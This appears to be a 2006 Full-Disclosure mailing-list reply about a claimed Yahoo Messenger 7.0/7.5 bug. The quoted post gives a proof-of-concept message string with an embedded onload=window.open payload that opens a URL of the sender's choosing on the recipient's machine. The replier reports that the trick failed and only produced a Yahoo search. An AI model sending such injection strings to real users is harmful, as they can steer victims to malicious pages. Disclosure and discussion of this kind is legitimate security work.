<div>I just tried this in Mesenger 7.0 and it never opened a browser window. I copied the text exactly from here and made sure the space after helomsg was [Alt]+0160 and the most I could get it to do was do a Yahoo Search on the string. Other side sees:
</div>
<div> </div>
<div>s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(<a href="mailto:?#@@*-)?@+#@;?(msg">?#@@*-)?@+#@;?(msg</a>: ---------------------------------------------<embed <br>onload=window.open('http:\\\\google.com/')>helomsg <br>
:+)-(%/?#()(=(/;_@#~$(@;+?/(<a href="mailto:?#@@*-)?@+#@;?(msg">?#@@*-)?@+#@;?(msg</a>: ---------------------------------------------<embed <br>onload=window.open('http:\\\\google.com/')>helomsg <br>:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
<br>Yahoo! Search: No results were found for helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(<a href="mailto:?#@@*-)?@+#@;?(msg">?#@@*-)?@+#@;?(msg</a>: ---------------------------------------------<embed <br>onload=window.open('http:\\\\google.com/')>helomsg
<br>:+)-(%/?#()(=(/;_@#~$(@;+?/(<a href="mailto:?#@@*-)?@+#@;?(msg">?#@@*-)?@+#@;?(msg</a>: ---------------------------------------------<embed <br>onload=window.open('http:\\\\google.com/')>helomsg <br>:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(.
</div>
<div> </div>
<div>There must be some other settings on either mesenger or the computer itself for this to work as you say. Possibly a setting for mesenger to use your default browser for searches in stead of the PM window?</div>
<div> </div>
<div>Cheers<br><br> </div>
<div><span class="gmail_quote">On 7/28/06, <b class="gmail_sendername">Ivan Ivan</b> <<a href="mailto:ivancool2003@yahoo.com.ar">ivancool2003@yahoo.com.ar</a>> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">Hi,<br>I found another vulnerability in yahoo messenger that<br>if you receive a Private message with this string
<br>"helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed<br>onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
<br>onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?("<br>(without quotes) Yahoo messenger open in this case<br><a href="http://google.com">google.com</a> in the internet explorer of the remote
<br>victim.<br><br>Yahoo messenger bug proof of concept:<br><br>1. Open messenger and log it.<br><br>2. Open a yahoo chat third party like yahelite through<br>Ymsgr protocol and log it with another account.<br><br>3. Send a Pm to the messenger account with this
<br>string: s: helomsg<br>:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed<br>onload=window.open('http:\\\\google.com/')>helomsg<br>:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
<br>onload=window.open('http:\\\\google.com/')>helomsg<br>:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(<br><br>4. The remote user will open <a href="http://www.google.com">www.google.com</a> (you can<br>change)<br><br>Note: "helomsg :" this space must be created with
<br>alt+0160 and this "s: " with a space<br><br>s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed<br>onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
<br>onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(<br><br>Tested in yahoo messenger 7.0/7.5<br><br><br>Regards.<br><br><br><br><br><br>__________________________________________________
<br>Preguntá. Respondé. Descubrí.<br>Todo lo que querías saber, y lo que ni imaginabas,<br>está en Yahoo! Respuestas (Beta).<br>¡Probalo ya!<br><a href="http://www.yahoo.com.ar/respuestas">http://www.yahoo.com.ar/respuestas
</a><br><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html">http://lists.grok.org.uk/full-disclosure-charter.html
</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/">http://secunia.com/</a><br></blockquote></div><br><br clear="all"><br>-- <br>There is intelligence is in having all the answers, but wisdom lies in knowing which of the questions to answer.